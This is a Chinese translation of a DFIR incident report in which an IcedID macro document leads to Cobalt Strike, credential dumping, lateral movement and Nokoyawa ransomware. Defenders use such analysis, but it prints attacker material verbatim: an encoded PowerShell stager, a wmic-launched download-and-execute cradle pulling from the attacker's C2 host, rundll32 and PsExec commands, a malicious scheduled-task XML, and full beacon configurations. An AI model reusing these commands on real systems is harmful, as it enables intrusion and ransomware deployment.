【DFIR报告翻译】IcedID恶意宏助攻Nokoyawa勒索软件

【DFIR报告翻译】IcedID恶意宏助攻Nokoyawa勒索软件
2023-5-23 22:9:43 Author: Desync InfoSec(查看原文) 阅读量:14 收藏

摘要

攻击组织已经流行使用IOS文件与LNK快捷方式或OneNote组合使用的方式来投递恶意软件，但我们发现仍然有一些攻击组织喜欢使用Office文档附加宏代码进行钓鱼攻击。

在本例中，我们记录了2022年第四季度发生的一起事件，攻击组织以Excel恶意文档为载荷针对意大利的组织（https://twitter.com/reecdeep/status/1577979717717721088?s=20&t=QWDIpjACeLzPOEy4DDGnUQ）进行攻击，部署IcedID。攻击组织可能希望针对那些未安装Microsoft Office更新补丁（https://learn.microsoft.com/en-us/deployoffice/security/internet-macros-blocked）以阻止从互联网下载的文档运行宏的组织。之前的年终总结中我们提出利用宏进行攻击的方式已经不再流行，但此案例发生在最近的时间，因此对传统的Office宏攻击我们仍然需要保持警惕。

一旦攻击者获取到主机权限，便开始加载Cobalt Strike载荷，利用RDP进行横向移动，使用PsExec在域范围内传播Nokoyawa勒索软件。根据其他安全专家的分析，Nokowaya勒索软件与Karma/Nemty勒索软件家族（https://www.sentinelone.com/labs/nokoyawa-ransomware-new-karma-nemty-variant-wears-thin-disguise/）/（https://www.fortinet.com/blog/threat-research/nokoyawa-variant-catching-up）有关。

技术汇总

根据许多公开的特征，我们以中高可信度判断这次入侵事件的源头恶意Excel文档来自于2022年10月初的钓鱼邮件恶意攻击活动。当用户打开Excel文档点击嵌入的图像时，宏代码将被执行。宏代码负责下载并将IcedID DLL载荷写入磁盘。然后，宏使用重命名的rundll32二进制文件执行恶意DLL。

在IcedID成功回连到C2服务器后的2分钟，IcedID进程开始使用一些Windows自带命令进行一些探测和信息收集行为，与我们之前的报告中的命令相同（https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/）（https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/）。同时在跳板机中创建计划任务进行权限维持。

两小时后，IcedID进程开始加载多个Cobalt Strike 会话，几分钟后，Cobalt Strike会话开始将权限提升为SYSTEM，并转储LSASS内存。之后攻击者开始新一轮的内网探测，并使用WMI在域控服务器上创建Cobalt Strike会话。

随后攻击者开始探测扫描1433端口来探测网络中的SQL Server数据库，并且同时对网络中的文件共享资源进行探测，浏览文件共享中的密码本文件。攻击者似乎已经将大部分共享文件传出网络，因为我们发现canary诱饵文件告警显示这些文件在企业网络之外被打开。

之后攻击者再无动作，直到第四天，攻击者在域控服务器上枚举域内计算机列表和高权限用户组。并尝试通过命名管道进行权限提升。

第六天一早，攻击者在跳板机上启动了Edge浏览器访问dropmefiles[.]com并下载了一个文件，8小时候，IcedID进程通过shell执行了adget和adfind两个工具对AD域中的资源进行枚举。

攻击者开始结合WMI命令、批处理脚本进行横向移动，在失陷主机中部署Cobalt Strike DLL。并且在失陷主机中转储凭证，以及使用批处理脚本对计算机名进行枚举。接下来的一天攻击者在不断探测网络中的资源。

第七天，攻击者通过RDP登录到其中一台失陷主机，从这台服务器开始部署勒索软件，使用批处理脚本调用PsExec将勒索软件部署在其他域内主机上，然后通过批处理脚本调用PsExec和WMI在其他主机上启动勒索软件。

从边界突破到部署勒索软件的TTR时间大概经过了148小时，攻击者要求支付20万美金的赎金，然而我们直接拒绝了。

入侵路径分析

边界突破

通过恶意文档的模板和C2服务器信息提取到的特征，我们发现这次入侵与已知的恶意邮件钓鱼活动有关，该活动针对意大利相关组织发起攻击。（https://twitter.com/reecdeep/status/1577979717717721088?s=20&t=QWDIpjACeLzPOEy4DDGnUQ）

攻击者通过带VBA宏的Excel文件投递IcedID恶意软件。文档中包含两个附带超链接的图片，当用户点击任意一个图片时就会触发执行宏代码。

宏代码功能为从一个硬编码的域名中下载第一阶段的IcedID载荷。

执行

IcedID

当宏代码执行时，会从指定域名中下载第一阶段载荷，如下图日志记录：

When the VBA macro from Excel calls out to the hard-coded domain, it has multiple interesting characteristics, including:

Two OPTIONS requests followed by a GET request.
User-agent fields mentioning Microsoft Office.
Specific HTTP headers such as X-Office-Major-Version , X-MSGETWEBURL , X-IDCRL_ACCEPTED , and UA-CPU.

在代码执行和下载载荷过程中，有以下有意思的特征：

先发送两个OPTIONS请求，再发送一个GET请求
User-Agent字段的值包含Microsoft Office
使用特殊的HTTP头，例如X-Office-Major-Version , X-MSGETWEBURL , X-IDCRL_ACCEPTED 和 UA-CPU.

Once the IcedID payload is successfully retrieved, it will be decoded with Base64 and written to disk. In this case, the payload was written to the path retrieved from Application.DefaultFilePath, which is the default path used by Excel when it opens files.

IcedID载荷下载完后，使用Base64进行解码并写入代码中的Application.DefaultFilePath路径。这个路径是Excel打开文件时的默认路径。

为IcedID载荷生成的随机名称可能是1到7个随机数字或4500。这是因为Rnd函数会返回“小于1但大于或等于零的值”（https://learn.microsoft.com/en-us/office/vba/language/reference/user-interface-help/rnd-function）。

下载完成后，开始以下动作：

将rundll32.exe复制到当前路径并重命名为calc.exe
使用这个calc.exe加载DLL

我们发现是Excel作为父进程调用的calc.exe加载DLL进程。

最终整理的代码执行流程如下图所示：

IcedID VNC

我们发现攻击者通过IcedID提供的VNC功能模块在跳板机中使用Microsoft Edge浏览器

通过@0xThiebaut（https://twitter.com/0xThiebaut）的工具PCAPeek（https://github.com/0xThiebaut/PCAPeek/），我们能够解析一些VNC流量。从工具的图形界面可以看到以下选项，如Edge、Chrome、Firefox、CMD、任务管理器和运行对话框。它似乎是KeyHole VNC模块，NVISO在2022年10月首次纰漏该模块（https://blog.nviso.eu/2023/03/20/icedids-vnc-backdoors-dark-cat-anubis-keyhole/）。

同时我们发现攻击者通过calc.exe打开运行对话框，详细信息参考（https://twitter.com/DanielStepanic/status/1647342498132393984）

同时攻击者还使用这种方式运行了以下程序：

Cobalt Strike

攻击者在入侵过程中使用了Cobalt Strike。IcedID恶意软件同时启动了使用PowerShell的CS载荷和DLL方式的CS载荷。

PowerShell载荷是从hxxps://aicsoftware[.]com:757/coin下载的，在VirusTotal上已经可以查询到该情报（https://www.virustotal.com/gui/url/913510daabfab8551b7da3780ad9010ef31384c4e4975681c7d845b816e29c6b）。以下是URL链接下载到的内容，我们可以观察到使用编码字符串在内存中创建了一个对象。我们将逐步解码此字符串以查看其中包含的Cobalt Strike配置。

$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("H4sIAAAAAAAA/9y969OySLIv+nnmr+gPK6K7g16tIqLuiBVxEBUQES94wdkTE6DIRZA7ivvs//1kVqGP79tvz8yOFfvLeSIMH6GoS1ZefplVWWyc4j83ReafCi0+Oz/9587Jcj++/cT+9a+X8nYq8H/85x+uU/wjyeLTP6zzOXPy/Kf/9de/LK3Min765T8qK/tHFJ/L0PntJ/IDCzrnMnN+/ctf/voXcqm85dbF+cfNKvzK+UfkFF58zn/6r59++ZuQJOM4svzb3//H/xDLLHNuBf39u+QUQp47kR36Tv7Lrz/9vz/tPSdz/lO3A+dU/PS/fvqPf/wuhbFthU2xWrROHoxCuJ3x3jw+WTiC3zdJ6Be//Pw//<---CROPPED_BASE64_CODE--->/Pj8+Pz4/Pj8+Pz4/Pj8+Pz4/Pj83/580/ff/rpD9tj9u3nP96//cu32j9/o//+aX/59sfrKvstOG7CX62jOFzw75r2/du//fSHP1RFf/nj/a900T/yn9Z3aq7Z+ukPf6OmZdl1RbX+4hf5Jfz69ZVaS77CX8eHS5gdT36YXZMgzH91Vlker/Z//fOfh+HFDvdhtLqEg2M2EIfgkhwP3jHBFT//vKV/+C0KL7+dsmPw22qzycI8/7YLs0O4bzZ+3ez3396S7CJW++5+fwy+//Lt90s2Zbu/XYpT+O1ff/4LjcK7ZH/95dtfFvS/zcZ/+H/fv1UVv3//Xt7UWmy3YaZu/7qiG7oed2FV889//qT7++XvJnIWHqJL/Mu32r1Zq9XwX1aj1v7rE2MdT8XPVXvUQNn6cyh/39VedvVdLUAmDl/hf+Ma/EOv//nsYv7ejsnm72ZPjug/nrLvP/3tp38HMzzV9OtbBQA="));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();

在使用base64解码后，我们发现载荷使用了CS默认的异或算法（https://decoded.avast.io/threatintel/decoding-cobalt-strike-understanding-payloads/）进行编码，再次进行解码得到以下内容：

在解码后的数据中我们可以发现MZ头，我们将数据保存，可以使用Didier Stevens（https://twitter.com/didierstevens）的1768.py工具（https://github.com/DidierStevens/DidierStevensSuite/blob/master/1768.py）提取出CS载荷的配置信息

完整配置信息如下：

Config found: xorkey b'.' 0x00000000 0x0000573e0x0001 payload type                     0x0001 0x0002 8 windows-beacon_https-reverse_https0x0002 port                             0x0001 0x0002 7570x0003 sleeptime                        0x0002 0x0004 625180x0004 maxgetsize                       0x0002 0x0004 18647360x0005 jitter                           0x0001 0x0002 370x0007 publickey                        0x0003 0x0100 30819f302e06092a864886f72e010101050003818d00308189028181009380b188bdba677c26ff8adc2fd5bde97d595fccaa7b389be52c2c76d5bad1537105f105e3303f03b29e6dd3066367c59146249f914e4aa18d8045ec45dc96dddd6e0edb8dead60763dede9aa61c8821c8045f7314580df527b8191fe0c831ffcb75564587be8ecf56cf938973f2cef6de420d9e1e7dc9a8cc1cc520aec3371d0203010001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000x0008 server,get-uri                   0x0003 0x0100 'aicsoftware\rcom,/templates'0x000e SpawnTo                          0x0003 0x0010 (NULL ...)0x001d spawnto_x86                      0x0003 0x0040 '%windir%\\syswow64\\regsvr32\rexe'0x001e spawnto_x64                      0x0003 0x0040 '%windir%\\sysnative\\regsvr32\rexe'0x001f CryptoScheme                     0x0001 0x0002 00x001a get-verb                         0x0003 0x0010 'GET'0x001b post-verb                        0x0003 0x0010 'POST'0x001c HttpPostChunk                    0x0002 0x0004 00x0025 license-id                       0x0002 0x0004 3054197760x0026 bStageCleanup                    0x0001 0x0002 10x0027 bCFGCaution                      0x0001 0x0002 00x0009 useragent                        0x0003 0x0100 'Mozilla/5\r0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601\r3\r9 (KHTML, like Gecko) Version/9\r0\r2 Safari/601\r3\r9'0x000a post-uri                         0x0003 0x0040 '/favicon'0x000b Malleable_C2_Instructions        0x0003 0x0100  Transform Input: [7:Input,4,2:600,3,46]   Print   Remove 600 bytes from begin   BASE64   Unknown instruction: 0x2e0x000c http_get_header                  0x0003 0x0200comonst_host_header Host: aicsoftware  Const_header Connection: close  Build Metadata: [7:Metadata,46,3,2:wordpress_logged_in=,6:Cookie,9:mark=true]   Unknown instruction: 0x2e   BASE64   Prepend wordpress_logged_in=   Header Cookie   Const_parameter mark=true0x002e process-inject-transform-x86     0x0003 0x0200 '\x00\x00\x00\x10\x00\x00\x00\x15Host: aicsoftware\rcom\x00\x00\x00\n\x00\x00\x00\x11Connection: close\x00\x00\x00\n\x00\x00\x00/Content-Type: application/x-www-form-urlencoded\x00\x00\x00\x07\x00\x00\x00\x01\x00\x00\x00\x0b\x00\x00\x00\x03\x00\x00\x00\x02\x00\x00\x00\x04yes=\x00\x00\x00\x04\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x02\x00\x00\x00\x0e__session__id=\x00\x00\x00\x06\x00\x00\x00\x06Cookie'0x0036 HostHeader                       0x0003 0x0080 (NULL ...)0x0032 UsesCookies                      0x0001 0x0002 10x0023 proxy_type                       0x0001 0x0002 2 IE settings0x003a TCP_FRAME_HEADER                 0x0003 0x0080 '\x00\x04'0x0039 SMB_FRAME_HEADER                 0x0003 0x0080 '\x00\x04'0x0037 EXIT_FUNK                        0x0001 0x0002 00x0028 killdate                         0x0002 0x0004 00x0029 textSectionEnd                   0x0002 0x0004 1778720x002a feSectionsInfo            0x0003 0x0028 '\x00À\x02\x00r¸\x03\x00\x00À\x03\x00\x88\x85\x04\x00\x00\x90\x04\x004°\x04\x00\x00À\x04\x00^Ï\x04'0x002b process-inject-start-rwx         0x0001 0x0002 4 PAGE_READWRITE0x002c process-inject-use-rwx           0x0001 0x0002 32 PAGE_EXECUTE_READ0x002d process-inject-min_alloc         0x0002 0x0004 61330x000d http_post_header                 0x0003 0x0100  Header 0x002f process-inject-transform-x64     0x0003 0x0100 '\x00\x00\x00\x06\x90\x90\x90\x90\x90\x90'0x0035 process-inject-stub              0x0003 0x0010 'µJþ\x01ìjuíó^\x1aDø½9)'0x0033 process-inject-execute           0x0003 0x0080 '\x01\x04\x03'0x0034 process-inject-allocation-method 0x0001 0x0002 00x0000Guessing Cobalt Strike version: 4.2 (max 0x003a)Sanity check Cobalt Strike config: OK

在整个入侵过程中，攻击者只在跳板机和域控服务器中使用了PowerShell形式的CS载荷，在其他失陷主机中使用的都是DLL形式的CS载荷。除此之外有关执行阶段的技术，是攻击者使用了一些批处理文件。

C:\Windows\system32\cmd.exe /c c:\windows\temp\1.bat-> rundll32.exe c:\windows\temp\1.dll, DllRegisterServer

权限维持

在边界突破阶段，攻击者在AppData\Roaming路径中创建了2个文件。

exdudipo.dll，是IcedID第一阶段的载荷
license.dat，是编码后的第二阶段载荷，由第一阶段直接加载到内存中

IcedID创建了一个执行DLL的计划任务，这是IcedID恶意软件最常见的权限维持手段。

<?xml version="1.0" encoding="UTF-16"?><Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">  <RegistrationInfo>    <URI>\{3774AD25-8218-8099-89BA-CE96C6E9DC4E}</URI>  </RegistrationInfo>  <Triggers>    <TimeTrigger id="TimeTrigger">      <Repetition>        <Interval>PT1H</Interval>        <StopAtDurationEnd>false</StopAtDurationEnd>      </Repetition>      <StartBoundary>2012-01-01T12:00:00</StartBoundary>      <Enabled>true</Enabled>    </TimeTrigger>    <LogonTrigger id="LogonTrigger">      <Enabled>true</Enabled>      <UserId>[REDACTED USER]</UserId>    </LogonTrigger>  </Triggers>  <Principals>    <Principal id="Author">      <RunLevel>HighestAvailable</RunLevel>      <UserId>[REDACTED DOMAIN]\[REDACTED USER]</UserId>      <LogonType>InteractiveToken</LogonType>    </Principal>  </Principals>  <Settings>    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>    <AllowHardTerminate>false</AllowHardTerminate>    <StartWhenAvailable>true</StartWhenAvailable>    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>    <IdleSettings>      <Duration>PT10M</Duration>      <WaitTimeout>PT1H</WaitTimeout>      <StopOnIdleEnd>true</StopOnIdleEnd>      <RestartOnIdle>false</RestartOnIdle>    </IdleSettings>    <AllowStartOnDemand>true</AllowStartOnDemand>    <Enabled>true</Enabled>    <Hidden>false</Hidden>    <RunOnlyIfIdle>false</RunOnlyIfIdle>    <WakeToRun>false</WakeToRun>    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>    <Priority>7</Priority>  </Settings>  <Actions Context="Author">    <Exec>      <Command>rundll32.exe</Command>      <Arguments>"C:\Users\[REDACTED USER]\AppData\Roaming\{02959BFD-29E0-6A95-3B77-5E55B8D01CB7}\{CA2AB541-E118-83C2-ADAD-8729FDCA00C0}\exdudipo.dll",#1 --pa="AntiquePeanut\license.dat"</Arguments>    </Exec>  </Actions></Task>

计划任务每一小时执行一次

权限提升

攻击者使用Cobalt Strike的Getsystem功能成功在两台失陷主机中提权，我们可以用过Sysmon的事件ID 1监测到进程的命名管道操作。

防护绕过

入侵过程中，攻击者使用了许多规避检测的手段

进程注入

攻击者通过CreateRemoteThread接口向正常进程注入恶意代码，Sysmon的事件ID 8 检测到了这个行为。

下表是我们使用Yara规则（https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike）进行内存扫描后的结果

Host	Process ID	ProcessName	CommandLine	Yara Rule
workstation.domain.local	612	winlogon.exe	winlogon.exe	win_cobalt_strike_auto
workstation.domain.local	828	svchost.exe	C:\Windows\system32\svchost.exe -k DcomLaunch -p	win_cobalt_strike_auto
fileshare.domain.local	760	svchost.exe	C:\Windows\system32\svchost.exe -k DcomLaunch -p	win_cobalt_strike_auto
fileshare.domain.local	4928	winlogon.exe	winlogon.exe	win_cobalt_strike_auto
fileshare.domain.local	1960	rundll32.exe	rundll32.exe c:\windows\temp\1.dll	win_cobalt_strike_auto
beachhead.domain.local	712	lsass.exe	C:\Windows\system32\lsass.exe	win_cobalt_strike_auto
beachhead.domain.local	812	svchost.exe	C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService	win_cobalt_strike_auto
beachhead.domain.local	5884	TextInputHost.exe	C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe -ServerName:InputApp.AppXjd5de1g66v206tj52m9d0dtpppx4cgpn.mca	win_cobalt_strike_auto
beachhead.domain.local	2036	sysmon64.exe	C:\Windows\sysmon64.exe -z syscliprpc9E7B7D3FAF371803	win_cobalt_strike_auto
beachhead.domain.local	2568	regsvr32.exe	C:\Windows\syswow64\regsvr32.exe	win_cobalt_strike_auto
beachhead.domain.local	9760	cmd.exe	C:\Windows\SysWOW64\cmd.exe	win_cobalt_strike_auto
server.domain.local	432	rundll32.exe	rundll32.exe 1.dll	win_cobalt_strike_auto

删除文件

攻击者在下载运行恶意载荷后，将其直接删除

以下都是攻击者上传后又删除了的文件

7.exeadfind.batadfind.exeadget.exead.7z1.bat1.dll7.exens.bat

系统工具重命名

攻击者通常会重命名常见的Windows系统工具，以避免触发监视工具使用的警报。下表总结了在这次入侵中观察到的被重命名的工具。

Windows Utility	Renamed Windows Utility
rundll32.exe	C:\Users\<REDACTED>\Documents\calc.exe
psexesvc.exe	C:\Windows\mstdc.exe

凭证窃取

攻击者在共享文件中发现一些保存了密码的文件，并且在其他网络环境中打开了该文件，详细信息我们在信息泄露章节讨论。

在入侵第二天，攻击者在域控服务器上通过Cobalt Strike会话转储了LSASS进程内存。我们发现攻击者修改LSASS进程的访问权限为0x1010，这是已知的Mimikatz特征（https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/）（https://www.splunk.com/en_us/blog/security/you-bet-your-lsass-hunting-lsass-access.html）。以下日志记录了CS会话转储LSASS内存的行为。在入侵过程的第四天和第六天，我们发现攻击者在其他主机上也开始转储LSASS 内存。

内网探测

内网探测中，攻击者使用了许多Windows自带工具，比较特别的是攻击者使用chcp命令修改了命令提示符的字符集为UTF-8，这在之前的报告中也有出现（https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/）

arp -achcp >&2chcp 65001chcp 65001 && c: && cd c:\dir \\<REDACTED>\c$ipconfig /allnet config workstationnet group "Domain Admins" /domainnet group "Domain Computers" /domainnet group "domain admins" /domnet group "enterprise admins" /domnet localgroup "administrators" /domnet view /allnet view /all /domainnet1 config workstationnltest /domain_trustsnltest /domain_trusts /all_trustsping <HOST_IP>systeminfowhoamiwhoami /upn

在入侵第一天的基础信息收集后，攻击者对企业内网中的SQL Server数据库资产进行了扫描

在入侵第六天，我们发现攻击者使用了AdFind和adget.exe，用于查看域内的所有用户、组、计算机、组织单位、子网和信任对象。

adfind.exe -gcb -sc trustdmpadfind.exe -f (objectcategory=group)adfind.exe -subnets -f (objectCategory=subnet)adfind.exe -f (objectcategory=organizationalUnit)adfind.exe -f objectcategory=computeradfind.exe -f (objectcategory=person)

adget是一种比较新的工具，我们第一次发现攻击者使用这种工具是在报告（https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/）中，这个工具与adfind的功能相同。

在收集AD数据信息后，我们发现攻击者使用WMI在远程计算机中收集操作系统版本和授权信息。

C:\Windows\system32\cmd.exe /C wmic /node:"REDACTED" /user:"USER" /password:"REDACTED" os get caption

此后攻击者又批量执行了nslookup命令，收集IP和计算机名的映射信息

最后攻击者又探测了网络中开放RDP服务的资产

横向移动

在整个入侵过程中，攻击者使用了以下几种横向移动技术

T1021.006 Remote Services: WinRM

我们通过父子进程树和DCE RPC流量发现攻击者使用WinRM工具在远程主机中执行命令的行为

T1047 WMI

攻击者通过以下命令在域控服务器上部署PowerShell形式的CS会话

C:\\Windows\\System32\\wbem\\wmic.exe  /node:REDACTED process call create \""cmd.exe /c powershell.exe -nop -w hidden -c \""\""IEX ((new-object net.webclient).downloadstring('https://aicsoftware[.]com:757/coin'))\""\"""

同样地，攻击者在远程主机上运行DLL文件时也使用了WMI

C:\Windows\system32\cmd.exe /C wmic /node:"REDACTED" process call create "c:\windows\system32\rundll32.exe c:\windows\temp\1.dll, DllRegisterServer

攻击者在部署勒索软件时同样使用到了WMI

wmic /node:REDACTED /user:DOMAIN\USER /password:REDACTED process call create cmd.exe /c copy \\REDACTED\c$\windows\temp\p.bat c:\windows\temp

T1021.002 Remote Services: SMB/Windows Admin Shares

在横向移动阶段，攻击者还使用了SMB协议

在勒索软件部署阶段，攻击者通过SMB传输PsExec程序，并重命名为mstdc.exe.

以下是一些PsExec相关的取证日志

将PsExec重命名很可能是攻击者为了绕过基本的PsExec检测规则。然而，有一些Sigma规则可以检测到这种特定的技术，如Florian Roth在2019年分享的规则所示。（https://twitter.com/cyb3rops/status/1130747925242482688）

攻击者还使用了copy命令利用SMB传输文件

cmd.exe /c copy \\REDACTED\c$\windows\temp\p.bat c:\windows\temp\

T1021.001 Remote Services: RDP

在入侵过程中，攻击者还使用了RDP协议进行横向移动，例如以下取证日志中，攻击者从跳板机RDP登录了许多域服务器。

内网信息收集

攻击者使用AdFind工具收集域信息，并使用7-zip将数据打包

7.exe a -mx3 ad.7z ad_*

远程控制

IcedID

在本案例中，IcedID恶意软件命中了ID：3298576311规则，与域名kicknocisd[.]com建立通信。

Suricata Rule Name	Domain	IP	AS ORG	Country
ET MALWARE Win32/IcedID Request Cookie	kicknocisd[.]com	159.65.169[.]200	DIGITALOCEAN-ASN	United States

在C2通信建立后，远程控制流量转移到以下IP：

Domain	IP	Port	JA3	JA3s
curabiebarristie[.]com	198.244.180.66	443	a0e9f5d64349fb13191bc781f81f42e1	ec74a5c51106f0419184d0dd08fb05bc
stayersa[.]art	198.244.180.66	443	a0e9f5d64349fb13191bc781f81f42e1	ec74a5c51106f0419184d0dd08fb05bc
guaracheza[.]pics	45.66.248.119	443	a0e9f5d64349fb13191bc781f81f42e1	ec74a5c51106f0419184d0dd08fb05bc
belliecow[.]wiki	45.66.248.119	443	a0e9f5d64349fb13191bc781f81f42e1	ec74a5c51106f0419184d0dd08fb05bc

从跳板机中取证的内存中，我们发现IcedID DLL进程外联了IP：45.66.248[.]119

回连VNC

在入侵期间我们还发现了IceID进程回连VNC的IP，

告警规则来自于Lenny Hansson（https://twitter.com/NetcowboyDK）的规则集（https://networkforensic.dk/SNORT/default.html）

Suricata Alert	IP	Port
NF – Malware IcedID BackConnect – Wait Command	137.74.104.108	8080
NF – Malware IcedID BackConnect – Start VNC command – 11	137.74.104.108	8080

在攻击者侧的VNC界面如下图所示

Web服务

在入侵第六天，攻击者通过VNC会话在跳板机中启动Edge浏览器，并非访问了一个可上传下载文件的网站dropmefiles[.]com，从SRUMDB中可以我们发现Edge浏览器存在文件下载行为，但我们无法确定攻击者具体下载了什么文件。

Cobalt Strike

T1071 / S0154

攻击者在跳板机上传了Cobalt Strike的恶意DLL文件p1.dll，这个DLL回连C2服务器23.29.115.152/aicsoftware[.]com的757端口和8080端口。之后攻击者进程注入的CS会话回连C2服务器50.3.132.232 /iconnectgs[.]com的8081端口。在第六天，攻击者新的CS会话回连C2服务器 5.8.18.242的443端口。

C2通信

以上截图是CS会话回连iconnectgs[.]com (50.3.132[.]232的流量统计，C2请求通过HTTP和加密的POST请求体传递。

C2配置

Domain	IP	Port	JA3	JA3s
aicsoftware[.]com	23.29.115.152	757	a0e9f5d64349fb13191bc781f81f42e1	f176ba63b4d68e576b5ba345bec2c7b7
aicsoftware[.]com	23.29.115.152	8080	N/A	N/A

{    "beacontype": [        "HTTP"    ],    "sleeptime": 62518,    "jitter": 37,    "maxgetsize": 1398708,    "spawnto": "AAAAAAAAAAAAAAAAAAAAAA==",    "license_id": 305419776,    "cfg_caution": false,    "kill_date": null,    "server": {        "hostname": "aicsoftware.com",        "port": 8080,        "publickey": "MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCTgLGIvbpnfCb/itwv1b3pfVlfzKp7OJvlLCx21brRU3EF8QXjMD8Dsp5t0wZjZ8WRRiSfkU5KoY2ARexF3Jbd3W4O243q1gdj3t6aphyIIcgEX3MUWC71J7gZH+DIMf/LdVZFh76Oz1bPk4lz8s723kIunh59yajMHMUgrsM3HQIDAQABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="    },    "host_header": "",    "useragent_header": null,    "http-get": {        "uri": "/br.js",        "verb": "GET",        "client": {            "headers": null,            "metadata": null        },        "server": {            "output": [                "print",                "prepend 600 characters",                "base64",                "mask"            ]        }    },    "http-post": {        "uri": "/es",        "verb": "POST",        "client": {            "headers": null,            "id": null,            "output": null        }    },    "tcp_frame_header": "AAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=",    "crypto_scheme": 0,    "proxy": {        "type": null,        "username": null,        "password": null,        "behavior": "Use IE settings"    },    "http_post_chunk": 0,    "uses_cookies": true,    "post-ex": {        "spawnto_x86": "%windir%\\syswow64\\regsvr32.exe",        "spawnto_x64": "%windir%\\sysnative\\regsvr32.exe"    },    "process-inject": {        "allocator": "VirtualAllocEx",        "execute": [            "CreateThread",            "RtlCreateUserThread",            "CreateRemoteThread"        ],        "min_alloc": 6133,        "startrwx": false,        "stub": "tUr+Aexqde3zXhpE+L05KQ==",        "transform-x86": [            "prepend '\\x90\\x90\\x90\\x90\\x90\\x90'"        ],        "transform-x64": [            "prepend '\\x90\\x90\\x90\\x90\\x90\\x90'"        ],        "userwx": false    },    "dns-beacon": {        "dns_idle": null,        "dns_sleep": null,        "maxdns": null,        "beacon": null,        "get_A": null,        "get_AAAA": null,        "get_TXT": null,        "put_metadata": null,        "put_output": null    },    "pipename": null,    "smb_frame_header": "AAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=",    "stage": {        "cleanup": true    },    "ssh": {        "hostname": null,        "port": null,        "username": null,        "password": null,        "privatekey": null    }}

Domain	IP	Port	JA3	JA3s
iconnectgs[.]com	50.3.132.232	8081	N/A	N/A

[{  "spawnto": "AAAAAAAAAAAAAAAAAAAAAA\u003d\u003d",  "pipename": null,  "dns_beacon": {    "put_metadata": null,    "get_TXT": null,    "get_AAAA": null,    "get_A": null,    "beacon": null,    "maxdns": null,    "dns_sleep": null,    "put_output": null,    "dns_idle": null  },  "smb_frame_header": "AAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\u003d",  "post_ex": {    "spawnto_x64": "%windir%\\sysnative\\svchost.exe",    "spawnto_x86": "%windir%\\syswow64\\svchost.exe"  },  "stage": {    "cleanup": "true"  },  "process_inject": {    "stub": "snNvHLupDUIob8Qr+6dPTQ\u003d\u003d",    "transform_x64": ["prepend \u0027\\x90\\x90\\x90\\x90\u0027"],    "transform_x86": ["prepend \u0027\\x90\\x90\\x90\\x90\u0027"],    "startrwx": "false",    "min_alloc": "5271",    "userwx": "false",    "execute": ["CreateThread", "RtlCreateUserThread", "CreateRemoteThread"],    "allocator": "VirtualAllocEx"  },  "uses_cookies": "true",  "http_post_chunk": "0",  "ssh": {    "privatekey": null,    "username": null,    "password": null,    "port": null,    "hostname": null  },  "useragent_header": null,  "maxgetsize": "1864478",  "proxy": {    "behavior": "Use IE settings",    "password": null,    "username": null,    "type": null  },  "tcp_frame_header": "AAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\u003d",  "server": {    "publickey": 